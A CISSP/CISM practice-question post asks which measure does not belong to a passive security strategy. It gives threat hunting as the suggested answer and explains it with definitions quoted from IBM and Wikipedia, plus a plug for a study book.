Which of the following is not a typical measure or practice implemented in a passive security strategy? (Wentz QOTD)
A. Vulnerability scanning
B. Penetration testing
C. Incident response
D. Threat hunting
Kindly be reminded that the suggested answer is for your reference only. It doesn’t matter whether you have the right or wrong answer. What really matters is your reasoning process and justifications.
My suggested answer is D. Threat hunting.
Wentz’s book, The Effective CISSP: Security and Risk Management, helps CISSP and CISM aspirants build a solid conceptual security model. It is a tutorial for information security and a supplement to the official study guides for the CISSP and CISM exams and an informative reference for security professionals.
Threat hunting, also known as cyberthreat hunting, is a proactive approach to identifying previously unknown, or ongoing non-remediated threats, within an organization’s network. (IBM)
Cyber threat hunting is an active cyber defence activity. It is “the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.” This is in contrast to traditional threat management measures, such as firewalls, intrusion detection systems (IDS), malware sandbox (computer security) and SIEM systems, which typically involve an investigation of evidence-based data after there has been a warning of a potential threat. (Wikipedia)
- Threat Hunting: An Active Cyber Defense Strategy for a Hostile Cyber World
- The pyramid of pain in threat hunting
- Threat Hunting Process
- Why threat hunting is important